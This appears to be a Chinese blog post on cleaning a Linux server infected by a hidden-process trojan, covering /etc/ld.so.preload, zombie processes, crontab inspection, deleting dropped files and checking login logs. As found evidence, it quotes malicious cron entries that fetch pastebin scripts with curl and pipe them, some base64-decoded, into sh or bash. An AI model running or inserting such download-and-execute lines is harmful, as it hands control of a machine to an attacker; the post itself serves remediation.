标签:删除 .com tmp down time roc base64 curl convert
通过 top 或者使用 ps aux
我这个通过top 命令看不到哪个进程占用了cup ,执行 cat /etc/ld.so.preload 查看,里面也加载了异常的文件,判断是用于隐藏进程用的, 建议将其内容注释掉或删除,执行ldconfig 然后再使用top 查看下进程。
ps -ef|grep shutdown [命令] 或者 /proc/4170 [pid]
ps aux | grep ‘defunct‘
或
ps -ef | grep defunct | grep -v grep | wc -l
ps -e -o ppid,stat | grep Z | cut -d" " -f2 | xargs kill -9
或
kill -HUP `ps -A -ostat,ppid | grep -e ‘^[Zz]‘ | awk ‘{print $2}‘`
crontab -l
或者
cd /var/spool/cron #查看这个文件夹下的文件删除
vim /etc/crontab
里面会有一个定时任务我的分别是一下这几个(删除), 浏览器打开网址是个脚本,通过base64 加密,解密即可看到脚本内容
* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh */1 * * * root /bin/sh /bin/httpdns /usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash
根据脚本删除脚本创建的文件,我这里删除的是
/usr/local/lib/libjdk.so ,/etc/ld.so.preload
日志文件 /var/log/wtmp ,系统的每一次登录,都会在此日志中添加记录,为了防止有人篡改,该文件为二进制文件
cd /var/log ; last 或者 last -f /var/log/wtmp
标签:删除 .com tmp down time roc base64 curl convert
原文地址:https://www.cnblogs.com/xuey/p/9566094.html
